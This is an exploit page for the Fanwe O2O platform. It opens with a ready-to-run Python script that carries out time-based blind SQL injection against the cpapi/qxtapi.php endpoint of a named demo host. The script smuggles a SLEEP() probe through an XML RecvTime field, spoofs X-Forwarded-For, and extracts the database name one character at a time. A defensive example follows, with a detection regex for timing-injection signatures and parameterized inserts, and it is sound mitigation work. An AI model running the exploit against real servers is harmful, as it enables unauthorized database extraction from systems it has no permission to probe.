Fanwe O2O SQLi
```python
#!/usr/bin/env python
# -*- coding: utf-8 -*-

from __future__ import print_function

import requests

host = "http://o2odemo.fanwe.net/"

# Time-based blind probe: the server sleeps for one second when the i-th
# character of DATABASE() equals the guessed ordinal, otherwise returns at once.
statement = "IF(ORD(SUBSTRING((DATABASE()), %s, 1)) = %s, SLEEP(1), 0)"
characters = list(" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~")

def main():
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
        "X-Forwarded-For": "221.179.180.156"}

    # XML body posted to cpapi/qxtapi.php; the RecvTime element closes the
    # original string literal and appends the timing probe.
    payload = "<A><Body><Message><SrcMobile>0</SrcMobile><Content>0</Content><RecvTime>0' OR %s#</RecvTime></Message></Body></A>" % statement

    info = ""
    for i in range(1, 42):
        for c in characters:
            try:
                data = payload % (i, ord(c))
                r = requests.post(host + "cpapi/qxtapi.php", headers=headers, data=data, timeout=6)
            except requests.Timeout:
                # A timeout is the signal that SLEEP(1) fired: the guess for position i is right.
                info += c
                print("\n[In Progress]: %s" % info)
                break
            else:
                print(">", end="")

    print("\n[Done]: %s" % info)

if __name__ == "__main__":
    main()
```
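For the receiving side, the following is an added example (not code from the page or from the Fanwe project) of how an endpoint that accepts this XML message format can both flag the time-based blind probe and make it inert. The XML layout (`Body/Message/SrcMobile|Content|RecvTime`) is taken from the payload above; the sample bodies, the sqlite3 `messages` table, and the signature regex are constructed assumptions for illustration. The point it demonstrates is that bound parameters store the injected value as plain text, so no `SLEEP()` is ever evaluated, while the signature check gives a detection hook for logging or alerting.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

# Constructed sample bodies in the shape the script above posts (not captured traffic).
BENIGN_BODY = ("<A><Body><Message><SrcMobile>13800000000</SrcMobile>"
               "<Content>hello</Content><RecvTime>2017-05-01 12:00:00</RecvTime>"
               "</Message></Body></A>")
PROBE_BODY = ("<A><Body><Message><SrcMobile>0</SrcMobile><Content>0</Content>"
              "<RecvTime>0' OR IF(ORD(SUBSTRING((DATABASE()), 1, 1)) = 111, SLEEP(1), 0)#</RecvTime>"
              "</Message></Body></A>")

# Markers typical of a time-based blind probe: a quote that closes the literal
# followed by a timing function, or a trailing comment token that discards the
# rest of the query. Assumed signature; tune it to the application's real inputs.
TIMING_PATTERN = re.compile(
    r'([\'"].{0,200}\b(SLEEP|BENCHMARK|WAITFOR)\s*\()|((--|#|/\*)\s*$)',
    re.IGNORECASE | re.DOTALL)

def parse_message(body):
    """Return (src_mobile, content, recv_time) from the XML body, or None if malformed."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    msg = root.find("./Body/Message")
    if msg is None:
        return None
    fields = []
    for tag in ("SrcMobile", "Content", "RecvTime"):
        el = msg.find(tag)
        fields.append(el.text if el is not None and el.text is not None else "")
    return tuple(fields)

def looks_like_timing_injection(value):
    """True when a field value carries the markers of a time-based blind SQLi probe."""
    return TIMING_PATTERN.search(value) is not None

def store_message(conn, src_mobile, content, recv_time):
    """Insert with bound parameters: the values never become part of the SQL text."""
    conn.execute(
        "INSERT INTO messages (src_mobile, content, recv_time) VALUES (?, ?, ?)",
        (src_mobile, content, recv_time))
    conn.commit()

def handle_body(conn, body):
    """Parse, flag, and store; returns ('rejected', reason) or ('stored', recv_time)."""
    parsed = parse_message(body)
    if parsed is None:
        return ("rejected", "malformed xml")
    src, content, recv = parsed
    if looks_like_timing_injection(recv):
        # In production this is the place to log the request for the SOC.
        return ("rejected", "timing injection signature")
    store_message(conn, src, content, recv)
    return ("stored", recv)

def new_db():
    """In-memory sqlite3 database with the assumed messages table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE messages (src_mobile TEXT, content TEXT, recv_time TEXT)")
    return conn

def stored_recv_times(conn):
    return [row[0] for row in conn.execute("SELECT recv_time FROM messages")]

if __name__ == "__main__":
    conn = new_db()
    print(handle_body(conn, BENIGN_BODY))
    print(handle_body(conn, PROBE_BODY))
    # Even without the signature check, binding keeps the probe inert: it is stored as text.
    store_message(conn, "0", "0", "0' OR SLEEP(1)#")
    print(stored_recv_times(conn))
```

The signature check is a detection aid, not the fix: the parameterized insert is what removes the vulnerability, and the final call in the usage block shows the probe string landing in the table as a literal rather than being executed.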